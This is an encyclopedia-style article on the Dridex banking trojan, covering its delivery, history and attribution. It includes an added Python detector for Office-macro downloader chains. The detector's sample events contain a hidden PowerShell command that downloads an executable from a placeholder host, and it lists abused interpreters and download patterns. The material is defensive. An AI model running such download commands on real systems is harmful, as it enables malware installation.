Dridex
Dridex, also known as Bugat and Cridex, is a banking trojan that steals online-banking credentials. It is typically delivered by malicious Microsoft Word (or Excel) documents whose embedded macros fetch and install the malware.
It primarily targets Windows users who open malicious email attachments in Word or Excel and enable the embedded macros; the macros then download Dridex and infect the system, exposing the user to banking theft.
Dridex is designed to steal banking information from infected machines and immediately launch fraudulent transactions. It installs a keyboard logger and performs web-injection (man-in-the-browser) attacks to capture credentials and other sensitive data entered into banking sessions.
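The delivery chain described above (an Office document whose macro spawns a script interpreter that downloads the payload) is the part of a Dridex infection that is easiest to catch on the endpoint. The following is an added example, not code from the original page and not Dridex code: a small detector over process-creation events whose field names are modelled on Sysmon Event ID 1 (ParentImage, Image, CommandLine). The sample events, hostnames and command lines are constructed for illustration and are not taken from any real Dridex campaign.

```python
"""Flag Office applications spawning a script interpreter with a download cue.

Added example: a detector for the macro -> downloader chain. Field names follow
Sysmon Event ID 1; the events below are constructed, not real telemetry.
"""
import json
import re
from dataclasses import dataclass

# Office hosts that should rarely, if ever, spawn a scripting engine.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Interpreters and LOLBins commonly abused by macro droppers.
SCRIPT_CHILDREN = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe",
}

# Substrings that indicate the child is fetching something from the network.
DOWNLOAD_CUES = re.compile(
    r"(https?://|downloadfile|downloadstring|invoke-webrequest|\biwr\b|"
    r"net\.webclient|start-bitstransfer|bitsadmin.*/transfer|certutil.*-urlcache)",
    re.IGNORECASE,
)


@dataclass
class Finding:
    pid: int
    parent: str
    child: str
    severity: str
    reason: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict):
    """Return a Finding for an Office->interpreter spawn, else None."""
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    if parent not in OFFICE_PARENTS or child not in SCRIPT_CHILDREN:
        return None
    if DOWNLOAD_CUES.search(cmd):
        return Finding(event["ProcessId"], parent, child, "high",
                       "Office app spawned interpreter with download cue")
    return Finding(event["ProcessId"], parent, child, "medium",
                   "Office app spawned script interpreter")


def scan(lines):
    """Run classify() over JSON-encoded events, returning the findings."""
    findings = []
    for line in lines:
        finding = classify(json.loads(line))
        if finding is not None:
            findings.append(finding)
    return findings


# Constructed sample events (hypothetical paths, PIDs and URLs).
SAMPLE_EVENTS = [
    {"ProcessId": 4120,
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -c (New-Object Net.WebClient)"
                    ".DownloadFile('http://example.invalid/inv.exe','%TEMP%\\inv.exe')"},
    {"ProcessId": 4188,
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c echo macro-test"},
    {"ProcessId": 4200,
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell Invoke-WebRequest http://example.invalid/update.ps1"},
    {"ProcessId": 4212,
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe",
     "CommandLine": "splwow64.exe 8192"},
]
SAMPLE_LINES = [json.dumps(e) for e in SAMPLE_EVENTS]

if __name__ == "__main__":
    for f in scan(SAMPLE_LINES):
        print(f"[{f.severity}] pid={f.pid} {f.parent} -> {f.child}: {f.reason}")
```

The third and fourth events are the negative cases a practitioner should keep in the test set: a PowerShell download launched from Explorer is not an Office-macro chain, and WINWORD.EXE spawning the print helper splwow64.exe is normal. In production the parent/child pairing is the strong signal; the download-cue regex only raises severity, since modern droppers often obfuscate the command line.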
Dridex first appeared in 2012 as an evolution of the earlier Cridex and Bugat banking trojans. It incorporated elements of its predecessors’ code but introduced a peer-to-peer (P2P) communication architecture to enhance concealment and redundancy.
By 2015, it had become one of the most prevalent financial malware strains, particularly targeting banking credentials through email-based phishing campaigns and malicious macro-laden attachments. That year, theft attributed to Dridex was estimated at £20 million in the United Kingdom and $10 million in the United States, with attacks reported in more than 20 countries. In early September 2016, researchers observed the malware beginning to target cryptocurrency wallets.
In 2017, Dridex was distributed through a widespread phishing campaign that exploited a Microsoft Word zero-day vulnerability. This method allowed infection without requiring users to enable macros and affected millions of users globally. Around the same time, newer versions of Dridex began exploiting a vulnerability in Microsoft Office and WordPad that allowed remote code execution.
In December 2019, US authorities filed charges against two suspects believed to have created the Dridex malware, including the alleged leader of the Evil Corp group behind it.
In 2022, IBM researchers found similarities between the Raspberry Robin worm and Dridex malware loaders. Their comparative analysis showed that both used similar string decoding algorithms, anti-analysis techniques, and payload decryption routines. IBM suggested that Evil Corp may be using Raspberry Robin infrastructure to carry out attacks.